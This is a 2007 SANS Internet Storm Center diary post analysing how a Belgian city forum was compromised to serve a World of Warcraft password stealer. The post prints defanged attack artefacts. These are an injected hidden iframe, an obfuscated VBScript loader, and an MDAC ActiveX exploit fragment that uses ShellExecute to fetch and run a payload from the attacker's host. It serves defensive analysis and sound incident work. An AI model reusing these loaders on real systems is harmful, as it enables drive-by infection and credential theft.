Threat Level: green Handler on Duty: Tom Webb

SANS ISC: InfoSec Handlers Diary Blog - Non-malicious compromise pointing to a benign VBScript! InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Non-malicious compromise pointing to a benign VBScript!

Published: 2007-08-28
Last Updated: 2007-08-28 12:55:22 UTC
by Maarten Van Horenbeeck (Version: 3)
0 comment(s)

Note: please tread carefully here. While we've obfuscated all malicious links, some of them are still live on the internet. Over the weekend we have been working with anti-virus vendors as well as the regional CERT team to have the issue resolved, but we haven't been quite as succesful as we've hoped. This attack doesn't merely apply to the site mentioned, but spreads out over hundreds of compromised sites - so you may feel like filtering the malicious URL mentioned.

At least if you believe everything your neighborhood webmaster tells you... Early last week, the forum of the website of Leuven, a major student town in Belgium, got compromised. National press reported the compromise occurred through so-called SQL infection (sic), after which links to a .cn web server were added. In an interview, an IT representative of the local government stated that the "hack was not malicious. No data on the website was removed, altered or stolen".

Reason enough for the Internet Storm Center to have a second look. Apparently several pages on the forum were altered to contain a script tag to:
hxxp://www xvgaoke.cn /ms/ltxs.js
 
This Javascript routes you to another page using a hidden iframe:
document.write("<ifra me width='0' height='0' src='hxxp ://www xvgaoke. cn/ms/ltxs.htm'></ifra me>");
 
The resulting page contains a piece of VBScript (reduced in size below for brevity), a hyperlink to Google and a counter hosted on a Chinese web server.
 
abc = "006F006E0020006500720072006F0072...65006E0022002C0030000D000A"
cde = "006F006E0020006500720072006F007...00065006E0022002C0030000D000A"
Function decode(x)
For i = 1 To Len(x) Step 4
If Mid(x, i, 4) = "0D0A" Then
decode = decode & vbCrLf
Else
decode = decode & Chr(Int("&H" & Mid(x, i, 4)))
End If
Next
End Function
execute (decode(abc))
execute (decode(cde))
 

 Naturally, we want to have a look at what this code does. It's easy to execute VBScripts on the desktop using the Windows Script Host, or WSH, and its tool wscript. The content can just be copied into a vbs file and executed. However, that's not what we want to do here, since the script says EXECUTE. Not a good idea.

 So, let's change these commands around a bit. Wscript contains a function that allows you to echo content to the screen in a message box:

wscript.echo (decode(abc))
wscript.echo (decode(cde))
 
Executing the script through wscript then results in some more VBScript which includes the following code:
 
on error resume next
m1="object"
m2="classid"
m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
m4="Microsoft.XMLHTTP"
m5="Shell.Application"
MircoLong="hxxp:// www xvgaoke. cn/ms/ltxs.vbs"
set MircoLonge=MircoLongc.createobject(m5,"")
MircoLonge.ShellExecute MircoLong9,BBS,BBS,"open",0
 
We can see a reference to BD96C556-65A3-11D0-983A-00C04FC29E36. This is the CLSID for a Microsoft Data Access component (MDAC). On April 12th, 2006, a Microsoft advisory reported on a significant vulnerability in an ActiveX control part of the ActiveX Data Objects (ADO), referenced in the exploit code above. Today still, this vulnerability is commonly exploited as part of so-called drive by exploits.
 
Without being noticed, the code then downloads ltts.exe from the same server and executes it on the victim system. On August 25th, the malware had a SHA1 hash of c1cbee89ba1033b8e739067eab086f70b476c5aa and was about 50 kb in size. Five days after the compromise took place, the binary was detected by 9 out of 32 anti-virus solutions. Note that it’s quite common for people running such malicious web server to change their malcode every so often as to reduce the risk of getting detected by anti-virus.
 
Once run on a system, the software drops a number of executables and installs one of them as a userinit value under the winlogon process. This makes for one of those pesty-difficult-to-remove pieces of spyware. In the end its final goal appears to be the gathering of World of Warcraft authentication credentials.
 
If you're still wondering why these are so prized, run this small google query. On-line games have recently seen the rise of so-called Real Money Transactions - yes, real money you can lose by getting compromised and others can gain. Blizzard, the WoW developer, strongly discourages this practice, but something of value to a player can always be sold on other markets.

So this leaves me wondering why exactly this was a non-malicious compromise ?

UPDATE: By popular request, here is the current AV recognition according to Virustotal. At least one of the two droppers is detected by:

Webwasher-Gateway       6.0.1/20070828  found [VBScript.Vulnerable.gen!High (suspicious)]
Authentium      4.93.8/20070828 found [HTML/IFrame]
F-Prot  4.3.2.48/20070828       found [HTML/IFrame]
Norman  5.80.02/20070828        found [JS/OnlineGames.A]

The actual executable is identified as malicious by:

AntiVir 7.4.1.63/20070828       found [TR/Crypt.FKM.Gen]
Avast   4.7.1029.0/20070827     found [Win32:WOW-FD]
CAT-QuickHeal   9.00/20070825   found [(Suspicious) - DNAScan]
DrWeb   4.33/20070828   found [Trojan.PWS.Wow]
eSafe   7.0.15.0/20070826       found [Suspicious Trojan/Worm]
F-Secure        6.70.13030.0/20070828   found [Trojan-PSW.Win32.WOW.sp]
Fortinet        2.91.0.0/20070828       found [W32/WoW!tr.pws]
Ikarus  T3.1.1.12/20070828      found [Trojan-PWS.Win32.WOW.pu]
Kaspersky       4.0.2.24/20070828       found [Trojan-PSW.Win32.WOW.sp]
NOD32v2 2488/20070828   found [Win32/PSW.WOW.SP]
Norman  5.80.02/20070828        found [W32/Wow.BJL]
Sunbelt 2.2.907.0/20070825      found [VIPRE.Suspicious]
Symantec        10/20070828     found [Infostealer.Wowcraft]
TheHacker       6.1.9.175/20070828      found [Trojan/PSW.WOW.sp]
VBA32   3.12.2.3/20070828       found [suspected of Trojan-PSW.Game.9 (paranoid heuristics)]
Webwasher-Gateway       6.0.1/20070828  found [Trojan.Crypt.FKM.Gen]

in order to prevent clients from being infected, you could consider blocking traffic to the xvgaoke.cn domain.

--
Maarten Van Horenbeeck

Keywords:
0 comment(s)
Diary Archives